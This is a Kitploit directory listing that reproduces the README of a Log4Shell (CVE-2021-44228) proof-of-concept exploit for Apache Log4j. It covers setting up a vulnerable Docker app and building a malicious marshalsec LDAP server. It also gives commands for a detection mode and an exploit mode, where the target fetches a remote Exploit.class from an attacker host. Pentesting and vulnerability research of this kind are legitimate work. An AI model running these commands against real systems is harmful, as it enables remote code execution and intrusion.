Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Log4Shell — Log4Shell CVE-2021-44228 PoC | Kitploit
Tools/GitHubGitHub/moften/log4shell
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubmoften/log4shell

Log4Shell

Log4Shell CVE-2021-44228 PoC

View Repository
111 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Log4Shell

(CVE-2021-44228)

☠️ Log4Shell PoC (CVE-2021-44228)

Proof-of-concept exploit for the critical Log4Shell vulnerability in Apache Log4j ≤ 2.14.1, which allows remote code execution via JNDI injections.

⚠️ This PoC is for educational purposes and controlled testing in authorized environments only. Do not use it against systems without explicit permission.


Requirements

  • Python 3.x
  • Java 8 or higher
  • marshalsec (for malicious LDAP server)
  • HTTP server (e.g., python3 -m http.server)
  • Docker (optional for vulnerable environment)

Local test environment (optional with Docker)

  1. Run the vulnerable app:

    root@kitploit:~
    docker run -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app
    
  2. Access: http://localhost:8080

root@kitploit:~
git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests

Usage

Passive detection mode:

root@kitploit:~
python3 main.py -u http://target.com -i burp.collab.net -m detect

Intrusive mode (requires Exploit.class on your HTTP server):

root@kitploit:~
python3 main.py -u http://target.com -i 192.168.0.100:1389 -m exploit
Download Tool